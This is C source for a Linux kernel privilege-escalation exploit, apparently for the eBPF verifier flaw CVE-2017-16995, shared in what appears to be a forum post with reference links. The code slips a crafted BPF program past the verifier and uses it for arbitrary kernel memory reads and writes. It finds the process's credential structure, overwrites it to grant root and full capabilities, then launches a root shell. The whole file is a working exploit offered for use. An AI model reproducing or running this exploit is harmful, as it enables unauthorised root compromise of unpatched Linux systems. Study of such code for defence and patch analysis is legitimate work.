
	attr.key_size = key_size;
	attr.value_size = value_size;
	attr.max_entries = max_entries;

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

/*
 * Issue the bpf(BPF_MAP_UPDATE_ELEM) system call: store *value under
 * *key in the map referred to by fd. Returns the syscall result.
 */
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
	union bpf_attr attr = { .map_fd = fd };

	attr.key = ptr_to_u64(key);
	attr.value = ptr_to_u64(value);
	attr.flags = flags;

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

/*
 * Issue the bpf(BPF_MAP_LOOKUP_ELEM) system call: ask the kernel to copy
 * the element stored under *key into *value. Returns the syscall result.
 */
int bpf_lookup_elem(int fd, void *key, void *value)
{
	union bpf_attr attr = { .map_fd = fd };

	attr.key = ptr_to_u64(key);
	attr.value = ptr_to_u64(value);

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/*
 * Instruction-builder macros. Each one expands to a struct bpf_insn
 * compound literal (BPF_LD_IMM64_RAW expands to two of them), so they are
 * meant to be used as elements of a struct bpf_insn array initializer.
 */

/* ALU64-class operation OP on DST with the immediate IMM as source (BPF_K). */
#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* ALU64-class register move: DST = SRC. */
#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

/* ALU-class (32-bit) register move: DST = SRC. */
#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

/* ALU64-class move of the immediate IMM into DST. */
#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* ALU-class (32-bit) move of the immediate IMM into DST. */
#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* 64-bit immediate load into DST; shorthand for BPF_LD_IMM64_RAW with SRC = 0. */
#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

/*
 * 64-bit immediate load encoded as TWO consecutive instructions: the first
 * carries the low 32 bits of IMM, the second (code 0) the high 32 bits.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code  = 0, 					\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = ((__u64) (IMM)) >> 32 })

/* Fallback for headers that do not provide BPF_PSEUDO_MAP_FD. */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD	1
#endif

/* 64-bit immediate load of MAP_FD with src_reg set to BPF_PSEUDO_MAP_FD. */
#define BPF_LD_MAP_FD(DST, MAP_FD)				\
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Memory load: DST = *(SIZE *)(SRC + OFF). */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Memory store from register: *(SIZE *)(DST + OFF) = SRC. */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Memory store of an immediate: *(SIZE *)(DST + OFF) = IMM. */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Conditional jump comparing DST against the immediate IMM with condition OP; OFF is the jump offset. */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Arbitrary instruction with every field given explicitly. */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)			\
	((struct bpf_insn) {					\
		.code  = CODE,					\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Program exit instruction. */
#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = 0 })

/*
 * Four-instruction prologue: a 32-bit move of 0xFFFFFFFF into r2, a JNE
 * against the same immediate that skips the next two instructions when
 * taken, then "r0 = 0; exit".
 *
 * The final line deliberately carries no trailing backslash, so the macro
 * definition ends here instead of continuing onto whatever line follows.
 */
#define BPF_DISABLE_VERIFIER()                                                       \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
	BPF_EXIT_INSN()                                   /* }                      */

/*
 * Eight-instruction sequence that looks up element `idx` of the map held
 * in r9 and loads its 64-bit value into register `dst`.
 *
 * Writes r1 and r2, uses the 4 bytes at fp-4 as the lookup key, and leaves
 * the element pointer returned by the helper in r0. If the helper returns
 * 0 the program exits immediately.
 */
#define BPF_MAP_GET(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */

/*
 * Assemble the instruction array and submit it through bpf_prog_load() as
 * a BPF_PROG_TYPE_SOCKET_FILTER program with a "GPL" license string.
 *
 * The program reads three 64-bit map slots (0 = op, 1 = address,
 * 2 = value) and dispatches on op; results are written back through r2,
 * which holds the pointer to slot 2.
 *
 * Returns the value returned by bpf_prog_load().
 */
static int load_prog() {
	struct bpf_insn prog[] = {
		BPF_DISABLE_VERIFIER(),

		/* Save the program's incoming r1 on the stack before r1 is reused below. */
		BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16),   /* *(fp - 16) = r1       */

		BPF_LD_MAP_FD(BPF_REG_9, mapfd),

		BPF_MAP_GET(0, BPF_REG_6),                         /* r6 = op               */
		BPF_MAP_GET(1, BPF_REG_7),                         /* r7 = address          */
		BPF_MAP_GET(2, BPF_REG_8),                         /* r8 = value            */

		/* store map slot address in r2 */
		/* r0 still holds the element pointer from the last BPF_MAP_GET (slot 2). */
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0               */
		BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

		/* Each JNE below skips its own branch body (2 or 3 instructions) when op does not match. */
		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),             /* if (op == 0)          */
		/* get fp */
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),             /* else if (op == 1)     */
		/* get skbuff */
		/* Reload the r1 value saved at fp - 16 and store it into slot 2. */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3),             /* else if (op == 2)     */
		/* read */
		/* r3 = *(u64 *)r7, then store r3 into slot 2. */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),
		/* else                  */
		/* write */
		/* *(u64 *)r7 = r8 */
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), 
		BPF_EXIT_INSN(),

	};
	/* sizeof(prog) is a byte count; bpf_prog_load() converts it to an instruction count. */
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

/* printf-style banner output: writes "[.] " followed by the formatted text to stdout. */
void info(const char *fmt, ...) {
	va_list ap;

	fputs("[.] ", stdout);
	va_start(ap, fmt);
	vfprintf(stdout, fmt, ap);
	va_end(ap);
}

/* printf-style progress output: writes "[*] " followed by the formatted text to stdout. */
void msg(const char *fmt, ...) {
	va_list ap;

	fputs("[*] ", stdout);
	va_start(ap, fmt);
	vfprintf(stdout, fmt, ap);
	va_end(ap);
}

/*
 * Like msg(), except that when the global doredact flag is non-zero a
 * fixed placeholder line is printed instead of the formatted message.
 *
 * The flag is tested before va_start() so that every va_start() is paired
 * with a va_end() on all return paths.
 */
void redact(const char *fmt, ...) {
	va_list args;

	if (doredact) {
		fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
		return;
	}

	va_start(args, fmt);
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

/*
 * Print "[!] " followed by the formatted message to stdout, then
 * terminate the process with exit status 1. Does not return.
 */
void fail(const char *fmt, ...) {
	va_list ap;

	fputs("[!] ", stdout);
	va_start(ap, fmt);
	vfprintf(stdout, fmt, ap);
	va_end(ap);

	exit(1);
}

/*
 * One-time setup: print the banner, create the 3-slot array map, load the
 * BPF program, create an AF_UNIX datagram socket pair and attach the
 * program to sockets[1]. Results are stored in the globals mapfd, progfd
 * and sockets. Any failure is reported through fail(), which exits.
 */
void 
initialize() {
	info("\n");
	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
	info("\n");
	info("  ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
	info("\n");

	redact("creating bpf map\n");
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
	if (mapfd < 0) {
		fail("failed to create bpf map: '%s'\n", strerror(errno));
	}

	redact("sneaking evil bpf past the verifier\n");
	progfd = load_prog();
	if (progfd < 0) {
		/*
		 * Capture errno right away: the stdio calls inside msg() may
		 * overwrite it before the final error message is formatted.
		 */
		int load_errno = errno;

		if (load_errno == EACCES) {
			msg("log:\n%s", bpf_log_buf);
		}
		fail("failed to load prog '%s'\n", strerror(load_errno));
	}

	redact("creating socketpair()\n");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
		fail("setsockopt '%s'\n", strerror(errno));
	}
}

/*
 * Write the whole global buffer to sockets[0] as one message.
 * A failed write is reported with perror(); a short write is reported on
 * stderr. Neither case is fatal.
 */
static void writemsg() {
	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
	if (n < 0) {
		perror("write");
		return;
	}
	/* n is non-negative here, so the conversion to size_t is value-preserving. */
	if ((size_t) n != sizeof(buffer)) {
		/* %zd is the conversion that matches ssize_t. */
		fprintf(stderr, "short write: %zd\n", n);
	}
}

/* Store `value` in slot `key` of the global map; exits via fail() on error. */
static void 
update_elem(int key, unsigned long value) {
	int rc = bpf_update_elem(mapfd, &key, &value, 0);

	if (rc != 0) {
		fail("bpf_update_elem failed '%s'\n", strerror(errno));
	}
}

/* Read and return slot `key` of the global map; exits via fail() on error. */
static unsigned long 
get_value(int key) {
	unsigned long slot;
	int rc = bpf_lookup_elem(mapfd, &key, &slot);

	if (rc != 0) {
		fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
	}
	return slot;
}

/*
 * Run one command through the attached program: fill map slots 0..2 with
 * op, addr and value (in that order), send a message with writemsg(), and
 * return what slot 2 contains afterwards.
 */
static unsigned long
sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
	const unsigned long slots[3] = { op, addr, value };

	for (int key = 0; key < 3; key++) {
		update_elem(key, slots[key]);
	}
	writemsg();

	unsigned long reply = get_value(2);
	return reply;
}

/* Issue command 1 (no address, no value) and return the reply. */
unsigned long
get_skbuff() {
	const unsigned long op_get_skbuff = 1;
	unsigned long reply = sendcmd(op_get_skbuff, 0, 0);

	return reply;
}

/* Issue command 0 (no address, no value) and return the reply. */
unsigned long
get_fp() {
	const unsigned long op_get_fp = 0;
	unsigned long reply = sendcmd(op_get_fp, 0, 0);

	return reply;
}

/* Issue command 2 for `addr` and return the 64-bit reply. */
unsigned long
read64(unsigned long addr) {
	const unsigned long op_read = 2;
	unsigned long reply = sendcmd(op_read, addr, 0);

	return reply;
}

/* Issue command 3 with `addr` and `val`; the reply is intentionally ignored. */
void
write64(unsigned long addr, unsigned long val) {
	const unsigned long op_write = 3;

	(void)sendcmd(op_write, addr, val);
}

/*
 * Return the address of the first 8-byte word, among the first 100 words
 * starting at the pointer read from skbuff + 24, whose value is
 * 0x7FFFFFFFFFFFFFFF. Exits via fail() when no such word is found.
 */
static unsigned long find_sk_rcvtimeo() {
	unsigned long skbuff = get_skbuff();
	/*
	 * struct sk_buff {
	 *     [...24 byte offset...]
	 *     struct sock     *sk;
	 * };
	 *
	 */
	unsigned long addr = read64(skbuff + 24);
	/* addr is an unsigned long, so the matching conversion is %lx. */
	msg("Leaking sock struct from %lx\n", addr);
	/*
	 * scan forward for expected sk_rcvtimeo value.
	 *
	 * struct sock {
	 *    [...]
	 *    long                    sk_rcvtimeo;             
	 *  };
	 */
	for (int i = 0; i < 100; i++, addr += 8) {
		if(read64(addr) == 0x7FFFFFFFFFFFFFFF) {
			msg("found sock->sk_rcvtimeo at offset %d\n", i * 8);
			return addr;
		}
	}
	fail("failed to find sk_rcvtimeo.\n");
	/* fail() exits; this return only keeps every path of a non-void function well-formed. */
	return 0;
}

/*
 * Return the 64-bit word stored immediately before the location reported
 * by find_sk_rcvtimeo().
 *
 * The value is kept in an unsigned long throughout, so it never passes
 * through a signed type on its way to the caller.
 */
static unsigned long find_cred() {
	/*
	 * struct sock {
	 *    [...]
	 *    const struct cred       *sk_peer_cred;
	 *    long                    sk_rcvtimeo;             
	 *  };
	 */
	unsigned long result = read64(find_sk_rcvtimeo() - 8);
	msg("found sock->sk_peer_cred\n");
	return result;
}

/*
 * Overwrite eight consecutive 64-bit words starting at addr:
 *   word 0    - its current low 32 bits, with the high 32 bits cleared
 *   words 1-4 - zero
 *   words 5-7 - all ones
 * NOTE(review): which structure fields these words cover depends on the
 * target structure's layout, which is not visible in this file.
 */
static void
hammer_cred(unsigned long addr) {
	/* addr is an unsigned long, so the matching conversion is %lx. */
	msg("hammering cred structure at %lx\n", addr);
/* do/while(0) makes w64(x); behave as exactly one statement. */
#define w64(w) do { write64(addr, (w)); addr += 8; } while (0)
	unsigned long val = read64(addr) & 0xFFFFFFFFUL;
	w64(val); 
	w64(0); w64(0); w64(0); w64(0);
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
#undef w64
}

/*
 * Program entry point: run initialize(), pass the result of find_cred()
 * to hammer_cred(), then replace the process image with /bin/sh.
 * Command-line arguments are not used.
 */
int
main(int argc, char **argv) {
	(void)argc;
	(void)argv;

	initialize();
	hammer_cred(find_cred());
	msg("credentials patched, launching shell...\n");
	/* exec discards unflushed stdio buffers, so push pending output out first. */
	fflush(stdout);
	/*
	 * The list terminator of a variadic exec call must be a null pointer of
	 * type char *; a bare NULL may be passed as an int.
	 * execl() returns only on failure.
	 */
	execl("/bin/sh", "/bin/sh", (char *)NULL);
	fail("exec %s\n", strerror(errno));
	return 1;
}

参考链接

[1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/

[2]https://security.tencent.com/index.php/blog/msg/124

[3]https://bbs.pediy.com/thread-249033.htm

[4]https://www.cnblogs.com/rebeyond/p/8921307.html

1 Like